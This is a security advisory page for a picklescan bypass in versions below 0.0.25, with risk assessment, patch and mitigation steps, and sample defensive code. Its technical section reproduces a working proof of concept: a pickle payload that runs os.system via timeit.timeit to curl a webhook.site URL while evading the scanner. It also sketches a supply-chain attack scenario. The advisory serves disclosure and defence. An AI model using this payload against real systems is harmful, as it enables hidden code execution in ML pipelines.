GHSA-v7x6-rv5q-mhwc: picklescan: bypass allows silent RCE in ML pipelines

GHSA-v7x6-rv5q-mhwc MEDIUM
Published April 7, 2025
CISO Take

picklescan's pickle safety scanner can be trivially bypassed using Python's built-in timeit module, rendering any 'clean' scan result untrustworthy for model files scanned with versions below 0.0.25. Update to 0.0.25 immediately and re-scan all previously approved model artifacts — any model cleared by the old scanner should be treated as unverified. Do not rely on picklescan as a sole gate; enforce sandboxed model loading and cryptographic provenance verification as defense-in-depth.

Risk Assessment

Effective risk is HIGH despite the medium CVSS rating. The vulnerability is trivially exploitable (PoC is public, requires no special skills), directly undermines a security control that organizations explicitly trust for ML supply chain protection, and creates a false sense of safety that is more dangerous than having no scanner at all. PyTorch ecosystem adoption is widespread in enterprise ML, meaning the blast radius of a successful supply chain campaign is significant. The real severity is masked by CVSS methodology not capturing the 'security control bypass' multiplier.

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
| --- | --- | --- | --- |
| picklescan | pip | < 0.0.25 | 0.0.25 |


Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

5 steps
  1. PATCH: Upgrade picklescan to >= 0.0.25 immediately across all environments.

  2. RE-SCAN: Re-run picklescan on all model artifacts previously cleared by older versions; treat prior approvals as void.

  3. AUDIT: Identify all pipelines, scripts, and platforms that invoke picklescan and verify the version in use.

  4. DEFENSE-IN-DEPTH: Do not rely solely on picklescan. Add model loading isolation (subprocess sandboxing, gVisor/seccomp, network-isolated containers) and enforce cryptographic signing plus provenance verification (e.g., Sigstore) for all model artifacts.

  5. DETECTION: Alert on unexpected outbound connections from model-loading processes; the PoC uses curl to a webhook, which is detectable via egress filtering and DNS monitoring.
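The upgrade gate in step 1 can be enforced in CI with a minimal version comparison. This is an illustrative sketch, not part of picklescan's API; it assumes a simple dotted-numeric version string, which could be obtained at runtime via `importlib.metadata.version("picklescan")`.

```python
def is_patched(version: str, patched: tuple = (0, 0, 25)) -> bool:
    """Return True if the given picklescan version is at or above the patched release."""
    parts = tuple(int(p) for p in version.split("."))
    # Tuple comparison is lexicographic, matching dotted-version ordering.
    return parts >= patched


# Example gate: fail the pipeline on any pre-0.0.25 scanner.
assert is_patched("0.0.25")
assert not is_patched("0.0.24")
```

A CI job that calls `is_patched` before trusting any scan output turns a silent stale-scanner condition into a hard build failure.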

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
Art. 9 - Risk management system
ISO 42001
A.6.1.2 - AI supply chain management
NIST AI RMF
GOVERN 1.2 - Policies and processes addressing AI risk
MEASURE 2.7 - AI system security and resilience evaluated
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-v7x6-rv5q-mhwc?

picklescan's pickle safety scanner can be trivially bypassed using Python's built-in timeit module, rendering any 'clean' scan result untrustworthy for model files scanned with versions below 0.0.25. Update to 0.0.25 immediately and re-scan all previously approved model artifacts — any model cleared by the old scanner should be treated as unverified. Do not rely on picklescan as a sole gate; enforce sandboxed model loading and cryptographic provenance verification as defense-in-depth.

Is GHSA-v7x6-rv5q-mhwc actively exploited?

No confirmed active exploitation of GHSA-v7x6-rv5q-mhwc has been reported, but organizations should still patch proactively.

How to fix GHSA-v7x6-rv5q-mhwc?

1. PATCH: Upgrade picklescan to >= 0.0.25 immediately across all environments.
2. RE-SCAN: Re-run picklescan on all model artifacts previously cleared by older versions; treat prior approvals as void.
3. AUDIT: Identify all pipelines, scripts, and platforms that invoke picklescan and verify the version in use.
4. DEFENSE-IN-DEPTH: Do not rely solely on picklescan. Add model loading isolation (subprocess sandboxing, gVisor/seccomp, network-isolated containers) and enforce cryptographic signing plus provenance verification (e.g., Sigstore) for all model artifacts.
5. DETECTION: Alert on unexpected outbound connections from model-loading processes; the PoC uses curl to a webhook, which is detectable via egress filtering and DNS monitoring.

What systems are affected by GHSA-v7x6-rv5q-mhwc?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps/CI-CD pipelines, model registries, data science workstations.

What is the CVSS score for GHSA-v7x6-rv5q-mhwc?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary

The `timeit.timeit()` function, a built-in Python library function, can be used to execute code from a malicious pickle file while evading picklescan's detection.

### Details

Pickle's deserialization process is known to allow execution of arbitrary functions via the `__reduce__` method. While picklescan is meant to detect such exploits, this attack evades detection by calling a built-in Python library function such as `timeit.timeit()`. Because the `timeit` module was not on the unsafe-globals blacklist, it raises no red flag during the security scan.

The attack proceeds in the following steps. First, the attacker crafts a payload whose `__reduce__` method returns a call to `timeit.timeit()`. Inside that call, the attacker imports a dangerous module such as `os` and invokes `os.system()` to run OS commands (for example, curl). The attacker then sends this malicious pickle file to the victim. The victim checks the file with picklescan, which detects no dangerous functions, and then calls `pickle.load()` on it, leading to remote code execution.

### PoC

1. The attacker crafts a malicious pickle file using the built-in `timeit.timeit()` function:

```
import pickle
import timeit

class Payload(object):
    def __reduce__(self):
        return timeit.timeit, ('', 'import os; os.system("curl https://webhook.site/95f3e1c3-ee37-4a5a-8544-ab4ce93475f6")')

def create_payload():
    with open('payload.pickle', 'wb') as f:
        pickle.dump(Payload(), f)

create_payload()
```

The attacker then sends this pickle file to the victim, who may load it with `pickle.load()`.

2. The victim uses picklescan to check whether the received pickle file is malicious:

```
picklescan -p payload.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0
```

3. Believing the file is safe based on the scan, the victim loads it, which triggers `timeit.timeit` to execute OS commands (in this example, curl):

```
import pickle

def load_payload():
    with open('payload.pickle', 'rb') as f:
        pickle.load(f)

load_payload()
```

### Impact

Severity: High

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the file is loaded. Supply chain attack: attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

### Recommended Solution

The suggested fix is to add the `timeit` module to the unsafe-globals blacklist.
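The blacklist gap described above is structural: any unlisted callable slips through. A deny-by-default alternative is to override `pickle.Unpickler.find_class` with an explicit allowlist, a pattern documented in the Python standard library's pickle documentation. This is an illustrative sketch, not picklescan code; the allowlist contents here are assumptions for the example.

```python
import io
import pickle


class AllowlistUnpickler(pickle.Unpickler):
    # Deny-by-default: only globals on this explicit allowlist may be resolved.
    # Real model formats would need a larger, carefully reviewed allowlist.
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"blocked global during unpickling: {module}.{name}")


def safe_loads(data: bytes):
    """Load pickle bytes, refusing any global not explicitly allowlisted."""
    return AllowlistUnpickler(io.BytesIO(data)).load()
```

Under this model, the `timeit.timeit` payload above fails inside `find_class("timeit", "timeit")` before any code runs, so the bypass never reaches execution.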

Exploitation Scenario

An attacker targets an organization's MLOps pipeline. They craft a malicious PyTorch model file where the __reduce__ method calls timeit.timeit() with an embedded OS command (e.g., a reverse shell or data exfiltration via curl). They contribute this model to a public Hugging Face repo or submit it as a 'pretrained checkpoint' via a pull request to an open-source project. A downstream organization's CI/CD pipeline clones the model, runs picklescan for safety validation, gets 'Infected files: 0', and proceeds to load the model in a staging or production training environment. Upon pickle.load(), the timeit call executes the embedded OS command with the privileges of the model-loading process — achieving RCE inside the ML infrastructure, typically with broad access to training data, API keys, and internal services.
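The provenance verification recommended in the mitigation steps can start with something as simple as pinning each approved model artifact to a SHA-256 digest and refusing to load anything that drifts. This is a minimal sketch using only the standard library; full provenance (e.g., Sigstore signatures) goes further, and the function name is illustrative.

```python
import hashlib


def verify_artifact(path: str, expected_sha256: str) -> None:
    """Raise unless the file at `path` matches its pinned SHA-256 digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        # Hash in chunks so large model checkpoints are not read into memory at once.
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    if h.hexdigest() != expected_sha256.lower():
        raise ValueError(f"digest mismatch for {path}; refusing to load")
```

Calling `verify_artifact` before `pickle.load()` (or `torch.load()`) makes a swapped checkpoint fail closed instead of executing, regardless of what any scanner reports.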

Timeline

Published
April 7, 2025
Last Modified
April 7, 2025
First Seen
March 24, 2026

Related Vulnerabilities